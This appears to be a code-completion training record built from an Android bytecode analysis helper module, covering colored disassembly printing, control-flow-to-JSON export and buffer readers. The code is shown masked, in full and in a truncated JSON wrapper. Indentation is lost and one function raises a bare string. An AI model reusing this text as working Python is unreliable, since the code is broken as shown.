def _PrintNote(note, tab=0):
print_fct = CONF['PRINT_FCT']
note_color = CONF['COLORS']['NOTE']
normal_color = CONF['COLORS']['NORMAL']
print_fct('\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\n'
)
<|reserved_special_token_0|>
def _PrintXRef(tag, items):
print_fct = CONF['PRINT_FCT']
for i in items:
print_fct('%s: %s %s %s %s\n' % (tag, i[0].get_class_name(), i[0].
get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for
j in i[1])))
<|reserved_special_token_0|>
def _PrintDefault(msg):
print_fct = CONF['PRINT_FCT']
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF['COLORS']['OFFSET']
offset_addr_color = CONF['COLORS']['OFFSET_ADDR']
instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']
branch_false_color = CONF['COLORS']['BRANCH_FALSE']
branch_true_color = CONF['COLORS']['BRANCH_TRUE']
branch_color = CONF['COLORS']['BRANCH']
exception_color = CONF['COLORS']['EXCEPTION']
bb_color = CONF['COLORS']['BB']
normal_color = CONF['COLORS']['NORMAL']
print_fct = CONF['PRINT_FCT']
colors = CONF['COLORS']['OUTPUT']
for i in basic_blocks:
print_fct('%s%s%s : \n' % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct('\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,
normal_color, offset_addr_color, idx, normal_color))
print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),
normal_color))
operands = ins.get_operands()
print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(
operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(' ')
if (op_value == 43 or op_value == 44) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs
[0][2].get_name(), branch_color))
print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1
][2].get_name()) for j in range(0, len(i.childs) -
1)) + ' ]%s' % normal_color)
elif len(i.childs) == 2:
print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0
][2].get_name(), branch_true_color))
print_fct(' '.join('%s' % c[2].get_name() for c in i.
childs[1:]) + ' ]%s' % normal_color)
else:
print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].
get_name() for c in i.childs) + ' ]%s' % normal_color)
idx += ins.get_length()
nb += 1
print_fct('\n')
if i.get_exception_analysis():
print_fct('\t%s%s%s\n' % (exception_color, i.exception_analysis
.show_buff(), normal_color))
print_fct('\n')
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d['reports'] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock['instructions'].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
d = {}
reports = []
d['reports'] = reports
hooks = {}
l = []
for DVMBasicMethodBlock in mx.basic_blocks.gets():
for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock
.childs):
if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1
].get_name():
preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')
cnblock = {}
cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(
) + '-pre'
cnblock['start'] = DVMBasicMethodBlock.start
cnblock['notes'] = []
cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]
cnblock['registers'] = 0
cnblock['instructions'] = []
cnblock['info_bb'] = 0
l.append(cnblock)
for parent in DVMBasicMethodBlock.fathers:
hooks[parent[-1].get_name()] = []
hooks[parent[-1].get_name()].append(preblock)
for idx, child in enumerate(parent[-1].childs):
if child[-1].get_name(
) == DVMBasicMethodBlock.get_name():
hooks[parent[-1].get_name()].append(child[-1])
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['start'] = DVMBasicMethodBlock.start
cblock['notes'] = DVMBasicMethodBlock.get_notes()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
last_instru = None
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
c_ins['formatted_operands'
] = DVMBasicMethodBlockInstruction.get_formatted_operands()
cblock['instructions'].append(c_ins)
if DVMBasicMethodBlockInstruction.get_op_value(
) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:
values = DVMBasicMethodBlock.get_special_ins(ins_idx)
cblock['info_next'] = values.get_values()
ins_idx += DVMBasicMethodBlockInstruction.get_length()
last_instru = DVMBasicMethodBlockInstruction
cblock['info_bb'] = 0
if DVMBasicMethodBlock.childs:
if len(DVMBasicMethodBlock.childs) > 1:
cblock['info_bb'] = 1
if last_instru.get_op_value() == 43 or last_instru.get_op_value(
) == 44:
cblock['info_bb'] = 2
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
ok = False
if DVMBasicMethodBlock.get_name() in hooks:
if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock
.get_name()]:
ok = True
cblock['Edge'].append(hooks[DVMBasicMethodBlock.
get_name()][0].get_name())
if not ok:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
if exception_analysis:
cblock['Exceptions'] = exception_analysis.get()
reports.append(cblock)
reports.extend(l)
return json.dumps(d)
class SV(object):
def __init__(self, size, buff):
self.__size = size
self.__value = unpack(self.__size, buff)[0]
def _get(self):
return pack(self.__size, self.__value)
def __str__(self):
return '0x%x' % self.__value
def __int__(self):
return self.__value
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = attr
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
def _export(self):
return [x for x in self.__value._fields]
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
def __str__(self):
return self.__value.__str__()
def object_to_bytes(obj):
"""
Convert a object to a bytearray or call get_raw() of the object
if no useful type was found.
"""
if isinstance(obj, str):
return bytearray(obj, 'UTF-8')
elif isinstance(obj, bool):
return bytearray()
elif isinstance(obj, int):
return pack('<L', obj)
elif obj == None:
return bytearray()
elif isinstance(obj, bytearray):
return obj
else:
return obj.get_raw()
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
def FormatClassToJava(input):
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return 'L' + input.replace('.', '/') + ';'
def FormatClassToPython(input):
i = input[:-1]
i = i.replace('/', '_')
i = i.replace('$', '_')
return i
def FormatNameToPython(input):
i = input.replace('<', '')
i = i.replace('>', '')
i = i.replace('$', '_')
return i
def FormatDescriptorToPython(input):
i = input.replace('/', '_')
i = i.replace(';', '')
i = i.replace('[', '')
i = i.replace('(', '')
i = i.replace(')', '')
i = i.replace(' ', '')
i = i.replace('$', '')
return i
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
from __future__ import print_function
from __future__ import absolute_import
from builtins import str
from builtins import range
from builtins import object
import hashlib
from xml.sax.saxutils import escape
from struct import unpack, pack
import textwrap
import json
from .anconf import warning, error, CONF, enable_colors, remove_colors, save_colors, color_range
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
def enable_print_colors(colors):
enable_colors(colors)
# Handle exit message
def Exit(msg):
warning("Error : " + msg)
raise ("oops")
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF["PRINT_FCT"]
print_fct("*" * 75 + "\n")
def _PrintSubBanner(title=None):
print_fct = CONF["PRINT_FCT"]
if title == None:
print_fct("#" * 20 + "\n")
else:
print_fct("#" * 10 + " " + title + "\n")
def _PrintNote(note, tab=0):
print_fct = CONF["PRINT_FCT"]
note_color = CONF["COLORS"]["NOTE"]
normal_color = CONF["COLORS"]["NORMAL"]
print_fct("\t" * tab + "%s# %s%s" % (note_color, note, normal_color) + "\n")
# Print arg into a correct format
def _Print(name, arg):
buff = name + " "
if type(arg).__name__ == 'int':
buff += "0x%x" % arg
elif type(arg).__name__ == 'long':
buff += "0x%x" % arg
elif type(arg).__name__ == 'str':
buff += "%s" % arg
elif isinstance(arg, SV):
buff += "0x%x" % arg.get_value()
elif isinstance(arg, SVs):
buff += arg.get_value().__str__()
print(buff)
def PrettyShowEx(exceptions):
if len(exceptions) > 0:
CONF["PRINT_FCT"]("Exceptions:\n")
for i in exceptions:
CONF["PRINT_FCT"]("\t%s%s%s\n" %
(CONF["COLORS"]["EXCEPTION"], i.show_buff(),
CONF["COLORS"]["NORMAL"]))
def _PrintXRef(tag, items):
print_fct = CONF["PRINT_FCT"]
for i in items:
print_fct("%s: %s %s %s %s\n" %
(tag, i[0].get_class_name(), i[0].get_name(),
i[0].get_descriptor(), ' '.join("%x" % j.get_idx()
for j in i[1])))
def _PrintDRef(tag, items):
print_fct = CONF["PRINT_FCT"]
for i in items:
print_fct("%s: %s %s %s %s\n" %
(tag, i[0].get_class_name(), i[0].get_name(),
i[0].get_descriptor(), ' '.join("%x" % j for j in i[1])))
def _PrintDefault(msg):
print_fct = CONF["PRINT_FCT"]
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF["COLORS"]["OFFSET"]
offset_addr_color = CONF["COLORS"]["OFFSET_ADDR"]
instruction_name_color = CONF["COLORS"]["INSTRUCTION_NAME"]
branch_false_color = CONF["COLORS"]["BRANCH_FALSE"]
branch_true_color = CONF["COLORS"]["BRANCH_TRUE"]
branch_color = CONF["COLORS"]["BRANCH"]
exception_color = CONF["COLORS"]["EXCEPTION"]
bb_color = CONF["COLORS"]["BB"]
normal_color = CONF["COLORS"]["NORMAL"]
print_fct = CONF["PRINT_FCT"]
colors = CONF["COLORS"]["OUTPUT"]
for i in basic_blocks:
print_fct("%s%s%s : \n" % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct("\t%s%-3d%s(%s%08x%s) " %
(offset_color, nb, normal_color, offset_addr_color, idx,
normal_color))
print_fct("%s%-20s%s" %
(instruction_name_color, ins.get_name(), normal_color))
operands = ins.get_operands()
print_fct(
"%s" %
", ".join(m_a.get_vm().colorize_operands(operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(" ")
# packed/sparse-switch
if (op_value == 0x2b or op_value == 0x2c) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct("%s[ D:%s%s " %
(branch_false_color, i.childs[0][2].get_name(),
branch_color))
print_fct(' '.join("%d:%s" % (
values[j], i.childs[j + 1][2].get_name()) for j in
range(0, len(i.childs) - 1)) + " ]%s" %
normal_color)
else:
if len(i.childs) == 2:
print_fct("%s[ %s%s " % (branch_false_color,
i.childs[0][2].get_name(),
branch_true_color))
print_fct(' '.join("%s" % c[2].get_name(
) for c in i.childs[1:]) + " ]%s" % normal_color)
else:
print_fct("%s[ " % branch_color + ' '.join(
"%s" % c[2].get_name() for c in i.childs) + " ]%s" %
normal_color)
idx += ins.get_length()
nb += 1
print_fct("\n")
if i.get_exception_analysis():
print_fct("\t%s%s%s\n" %
(exception_color, i.exception_analysis.show_buff(),
normal_color))
print_fct("\n")
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d["reports"] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock["BasicBlockId"] = DVMBasicMethodBlock.get_name()
cblock["registers"] = mx.get_method().get_code().get_registers_size()
cblock["instructions"] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins["idx"] = ins_idx
c_ins["name"] = DVMBasicMethodBlockInstruction.get_name()
c_ins["operands"] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock["instructions"].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock["Edge"] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock["Edge"].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
d = {}
reports = []
d["reports"] = reports
hooks = {}
l = []
for DVMBasicMethodBlock in mx.basic_blocks.gets():
for index, DVMBasicMethodBlockChild in enumerate(
DVMBasicMethodBlock.childs):
if DVMBasicMethodBlock.get_name(
) == DVMBasicMethodBlockChild[-1].get_name():
preblock = TmpBlock(DVMBasicMethodBlock.get_name() + "-pre")
cnblock = {}
cnblock["BasicBlockId"] = DVMBasicMethodBlock.get_name(
) + "-pre"
cnblock["start"] = DVMBasicMethodBlock.start
cnblock["notes"] = []
cnblock["Edge"] = [DVMBasicMethodBlock.get_name()]
cnblock["registers"] = 0
cnblock["instructions"] = []
cnblock["info_bb"] = 0
l.append(cnblock)
for parent in DVMBasicMethodBlock.fathers:
hooks[parent[-1].get_name()] = []
hooks[parent[-1].get_name()].append(preblock)
for idx, child in enumerate(parent[-1].childs):
if child[-1].get_name() == DVMBasicMethodBlock.get_name(
):
hooks[parent[-1].get_name()].append(child[-1])
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock["BasicBlockId"] = DVMBasicMethodBlock.get_name()
cblock["start"] = DVMBasicMethodBlock.start
cblock["notes"] = DVMBasicMethodBlock.get_notes()
cblock["registers"] = mx.get_method().get_code().get_registers_size()
cblock["instructions"] = []
ins_idx = DVMBasicMethodBlock.start
last_instru = None
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins["idx"] = ins_idx
c_ins["name"] = DVMBasicMethodBlockInstruction.get_name()
c_ins["operands"] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
c_ins["formatted_operands"
] = DVMBasicMethodBlockInstruction.get_formatted_operands()
cblock["instructions"].append(c_ins)
if (DVMBasicMethodBlockInstruction.get_op_value() == 0x2b or
DVMBasicMethodBlockInstruction.get_op_value() == 0x2c):
values = DVMBasicMethodBlock.get_special_ins(ins_idx)
cblock["info_next"] = values.get_values()
ins_idx += DVMBasicMethodBlockInstruction.get_length()
last_instru = DVMBasicMethodBlockInstruction
cblock["info_bb"] = 0
if DVMBasicMethodBlock.childs:
if len(DVMBasicMethodBlock.childs) > 1:
cblock["info_bb"] = 1
if (last_instru.get_op_value() == 0x2b or
last_instru.get_op_value() == 0x2c):
cblock["info_bb"] = 2
cblock["Edge"] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
ok = False
if DVMBasicMethodBlock.get_name() in hooks:
if DVMBasicMethodBlockChild[-1] in hooks[
DVMBasicMethodBlock.get_name()
]:
ok = True
cblock["Edge"].append(hooks[DVMBasicMethodBlock.get_name(
)][0].get_name())
if not ok:
cblock["Edge"].append(DVMBasicMethodBlockChild[-1].get_name())
exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
if exception_analysis:
cblock["Exceptions"] = exception_analysis.get()
reports.append(cblock)
reports.extend(l)
return json.dumps(d)
class SV(object):
def __init__(self, size, buff):
self.__size = size
self.__value = unpack(self.__size, buff)[0]
def _get(self):
return pack(self.__size, self.__value)
def __str__(self):
return "0x%x" % self.__value
def __int__(self):
return self.__value
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = attr
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
def _export(self):
return [x for x in self.__value._fields]
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
def __str__(self):
return self.__value.__str__()
def object_to_bytes(obj):
"""
Convert a object to a bytearray or call get_raw() of the object
if no useful type was found.
"""
if isinstance(obj, str):
return bytearray(obj, "UTF-8")
elif isinstance(obj, bool):
return bytearray()
elif isinstance(obj, int):
return pack("<L", obj)
elif obj == None:
return bytearray()
elif isinstance(obj, bytearray):
return obj
else:
#print type(obj), obj
return obj.get_raw()
class MethodBC(object):
def show(self, value):
getattr(self, "show_" + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, "wb") as fd:
fd.write(buff)
def FormatClassToJava(input):
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return "L" + input.replace(".", "/") + ";"
def FormatClassToPython(input):
i = input[:-1]
i = i.replace("/", "_")
i = i.replace("$", "_")
return i
def FormatNameToPython(input):
i = input.replace("<", "")
i = i.replace(">", "")
i = i.replace("$", "_")
return i
def FormatDescriptorToPython(input):
i = input.replace("/", "_")
i = i.replace(";", "")
i = i.replace("[", "")
i = i.replace("(", "")
i = i.replace(")", "")
i = i.replace(" ", "")
i = i.replace("$", "")
return i
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
|
flexible
|
{
"blob_id": "2e6f04c3ff3e47a2c3e9f6a7d93e7ce2955a2756",
"index": 8354,
"step-1": "<mask token>\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n <mask token>\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n <mask token>\n\n\n<mask token>\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\n<mask token>\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-2": "<mask token>\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\n<mask token>\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF['PRINT_FCT']\n print_fct('*' * 75 + '\\n')\n\n\n<mask token>\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF['PRINT_FCT']\n note_color = CONF['COLORS']['NOTE']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct('\\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\\n'\n )\n\n\n<mask token>\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF['PRINT_FCT']\n for i in items:\n print_fct('%s: %s %s %s %s\\n' % (tag, i[0].get_class_name(), i[0].\n get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for\n j in i[1])))\n\n\n<mask token>\n\n\ndef _PrintDefault(msg):\n print_fct = CONF['PRINT_FCT']\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n offset_color = CONF['COLORS']['OFFSET']\n offset_addr_color = CONF['COLORS']['OFFSET_ADDR']\n instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']\n branch_false_color = CONF['COLORS']['BRANCH_FALSE']\n branch_true_color = CONF['COLORS']['BRANCH_TRUE']\n branch_color = CONF['COLORS']['BRANCH']\n exception_color = CONF['COLORS']['EXCEPTION']\n bb_color = CONF['COLORS']['BB']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct = CONF['PRINT_FCT']\n colors = CONF['COLORS']['OUTPUT']\n for i in basic_blocks:\n print_fct('%s%s%s : \\n' % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n print_fct('\\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,\n normal_color, offset_addr_color, idx, normal_color))\n print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),\n normal_color))\n operands = ins.get_operands()\n print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(\n operands, colors)))\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(' ')\n if (op_value == 43 or op_value == 44) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs\n [0][2].get_name(), branch_color))\n print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1\n ][2].get_name()) for j in range(0, len(i.childs) - \n 1)) + ' ]%s' % normal_color)\n elif len(i.childs) == 2:\n print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0\n ][2].get_name(), branch_true_color))\n print_fct(' '.join('%s' % c[2].get_name() for c in i.\n childs[1:]) + ' ]%s' % normal_color)\n else:\n print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].\n get_name() for c in i.childs) + ' ]%s' % normal_color)\n idx += ins.get_length()\n nb += 1\n print_fct('\\n')\n if i.get_exception_analysis():\n print_fct('\\t%s%s%s\\n' % (exception_color, i.exception_analysis\n .show_buff(), normal_color))\n print_fct('\\n')\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d['reports'] = reports\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n cblock['instructions'].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n reports.append(cblock)\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d['reports'] = reports\n hooks = {}\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock\n .childs):\n if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1\n ].get_name():\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')\n cnblock = {}\n cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(\n ) + '-pre'\n cnblock['start'] = DVMBasicMethodBlock.start\n cnblock['notes'] = []\n cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]\n cnblock['registers'] = 0\n cnblock['instructions'] = []\n cnblock['info_bb'] = 0\n l.append(cnblock)\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name(\n ) == DVMBasicMethodBlock.get_name():\n hooks[parent[-1].get_name()].append(child[-1])\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['start'] = DVMBasicMethodBlock.start\n cblock['notes'] = DVMBasicMethodBlock.get_notes()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n c_ins['formatted_operands'\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n cblock['instructions'].append(c_ins)\n if DVMBasicMethodBlockInstruction.get_op_value(\n ) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 